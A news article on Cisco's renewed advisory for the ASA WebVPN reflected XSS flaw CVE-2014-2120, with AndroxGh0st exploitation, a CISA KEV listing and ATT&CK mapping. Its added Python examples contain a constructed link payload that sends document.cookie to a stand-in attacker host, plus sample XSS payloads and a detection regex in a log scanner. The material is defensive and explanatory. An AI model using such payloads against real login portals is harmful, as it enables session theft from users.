On Monday, Cisco issued an updated advisory warning of ongoing exploitation attempts against a long-standing vulnerability in its Adaptive Security Appliance (ASA). The flaw, tracked as CVE-2014-2120, carries a CVSS score of 4.3 (medium) and stems from insufficient input validation in the WebVPN login page. It allows an unauthenticated, remote attacker to mount a cross-site scripting (XSS) attack against a user of the appliance's WebVPN portal: the attacker's script runs in the victim's browser in the context of the ASA's login page, not on the appliance itself.
Cisco cautioned that an attacker exploits the weakness by persuading a user to click a crafted link to the affected login page. The advisory, originally released in March 2014, has regained attention after Cisco became aware of "additional attempted exploitation" of the vulnerability, and on December 2, 2024, the company revised its bulletin to reflect this activity.
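The advisory only describes the flaw as a reflected XSS caused by insufficient input validation, so the following is an added illustration of that bug class, not Cisco's code and not the actual ASA page or parameter. The hostname, the `next` parameter and the login template are assumptions; the crafted link is constructed. It shows the chain the advisory describes (victim clicks a link, the server reflects the parameter into the page), and then the two fixes a practitioner would expect: validating the input against an allowlist, and HTML-encoding it for the attribute context when it is rendered.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed attacker link: the "malicious link" a victim is persuaded to click.
# Host, path and parameter name are illustrative assumptions, not ASA's real ones.
CRAFTED_LINK = (
    "https://vpn.example.test/login"
    "?next=%22%3E%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example.test"
    "%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)

# Hypothetical login page: the 'next' value is reflected into a hidden-input attribute.
TEMPLATE = (
    '<html><body><form method="post" action="/login">'
    '<input type="hidden" name="next" value="{next}">'
    '<input name="user"><input name="pass" type="password">'
    "</form></body></html>"
)


def next_param(link: str) -> str:
    """Extract the URL-decoded 'next' parameter exactly as the server would see it."""
    qs = parse_qs(urlsplit(link).query, keep_blank_values=True)
    return qs.get("next", [""])[0]


def render_login_vulnerable(next_url: str) -> str:
    """Vulnerable pattern: the parameter is reflected with no validation or encoding,
    so a value containing '">' terminates the attribute and injects a <script> tag."""
    return TEMPLATE.format(next=next_url)


def validate_next(next_url: str) -> str:
    """Input validation: accept only a same-site relative path made of safe characters;
    anything else (absolute URLs, protocol-relative '//', markup) falls back to '/'."""
    allowed = "/-_.?=&"
    if (
        next_url.startswith("/")
        and not next_url.startswith("//")
        and all(c.isalnum() or c in allowed for c in next_url)
    ):
        return next_url
    return "/"


def render_login_safe(next_url: str) -> str:
    """Hardened pattern: validate, then HTML-encode for the attribute context.
    quote=True escapes both quote characters, so no value can close the attribute."""
    return TEMPLATE.format(next=html.escape(validate_next(next_url), quote=True))


def reflects_script(page: str) -> bool:
    """Crude check: does the rendered page contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    payload = next_param(CRAFTED_LINK)
    print("decoded parameter:", payload)
    print("vulnerable page reflects script:", reflects_script(render_login_vulnerable(payload)))
    print("hardened page reflects script:  ", reflects_script(render_login_safe(payload)))
```

Note that encoding alone (without `validate_next`) would already stop the script from executing; the allowlist is there because a redirect parameter also needs to resist open-redirect abuse, and because "insufficient input validation" is the root cause the advisory names.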
Recent findings by cybersecurity firm CloudSEK noted that the AndroxGh0st threat actors have incorporated an array of vulnerabilities, including CVE-2014-2120, into their malware operations. This integration highlights a systematic exploitation of various weaknesses in internet-facing applications to spread their malicious software.
CloudSEK also observed AndroxGh0st leveraging the Mozi botnet, extending its reach when attacking targeted systems. Taken together, this makes the flaw a live concern for organizations that still run unpatched Cisco ASA devices.
In response to the renewed activity, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the flaw to its Known Exploited Vulnerabilities (KEV) Catalog last month, requiring Federal Civilian Executive Branch agencies to remediate it by December 3, 2024. A KEV listing reflects evidence of active exploitation rather than severity: despite its modest CVSS score, the bug is being used in the wild.
Given the increased exploitation attempts, Cisco ASA users are strongly advised to upgrade to a fixed ASA software release as described in Cisco's advisory. Because the attack runs in the browser of whoever visits the crafted link, the appliance's users, not just the appliance, are the target, so patching the reflection point is the only complete fix.
When mapping this activity to the MITRE ATT&CK framework, the relevant techniques are delivery of the crafted link (Phishing: Spearphishing Link, T1566.002) and the victim opening it (User Execution: Malicious Link, T1204.001) under the Initial Access and Execution tactics, together with the probing of the WebVPN login page itself (Exploit Public-Facing Application, T1190). Defenders can look for requests to the WebVPN login page whose parameters carry script markup, typically percent-encoded one or more times.
For those managing Cisco systems, staying current on known exploited vulnerabilities is vital, not only to meet federal requirements but also to keep a ten-year-old bug from becoming an entry point into the organization.
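As an added example (not from Cisco, CloudSEK or CISA), the following Python scans web access records for requests to the ASA clientless VPN login page that carry script markup in a query parameter, decoding percent-encoding repeatedly so that double-encoded payloads are not missed. The log lines are constructed in a simplified "client method target status" layout, not real ASA syslog; the login path `/+CSCOE+/logon.html` is the ASA clientless VPN login URL, but the parameter names used in the samples are assumptions, since the advisory does not name the affected parameter.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample records (client IP, method, request target, status). Not real ASA logs.
SAMPLE_LOG = """\
203.0.113.10 GET /+CSCOE+/logon.html 200
203.0.113.10 POST /+webvpn+/index.html 302
198.51.100.7 GET /+CSCOE+/logon.html?next=%3Cscript%3Ealert(1)%3C%2Fscript%3E 200
198.51.100.7 GET /+CSCOE+/logon.html?next=%253Cscript%253Ealert(1)%253C%252Fscript%253E 200
192.0.2.44 GET /+CSCOE+/logon.html?lang=en 200
192.0.2.44 GET /+CSCOE+/logon.html?next=javascript%3Aalert(document.cookie) 200
"""

# ASA clientless VPN login page; the query parameters in the samples are assumptions.
LOGIN_PATH = "/+CSCOE+/logon.html"

# Broad indicators of script injection, matched against the fully decoded value.
# Tune for your environment; '\bon\w+=' catches event handlers without matching words like 'section='.
XSS_PATTERNS = re.compile(
    r"(<\s*script|javascript\s*:|\bon\w+\s*=|<\s*(?:img|svg|iframe)\b)",
    re.IGNORECASE,
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded) to defeat multi-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a hit for a login-page request whose parameter decodes to script markup."""
    parts = line.split()
    if len(parts) < 4:
        return None
    ip, method, target, status = parts[:4]
    url = urlsplit(target)
    if url.path != LOGIN_PATH:
        return None
    # parse_qsl performs the first decode; fully_decode handles further layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if XSS_PATTERNS.search(decoded):
            return {"ip": ip, "method": method, "param": name, "decoded": decoded, "status": status}
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan every record and collect the hits in order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


def hits_by_ip(text: str) -> Dict[str, int]:
    """Count hits per source address, a convenient pivot for blocking or triage."""
    counts: Dict[str, int] = {}
    for hit in scan_log(text):
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["param"]}={hit["decoded"]!r} (HTTP {hit["status"]})')
    print(hits_by_ip(SAMPLE_LOG))
```

A 200 status on such a request says nothing about whether the reflection actually occurred; on a patched ASA the page simply renders safely. Treat the hits as reconnaissance or delivery attempts (T1190, or T1566.002 if the request came from a victim's browser) and confirm the running software version separately.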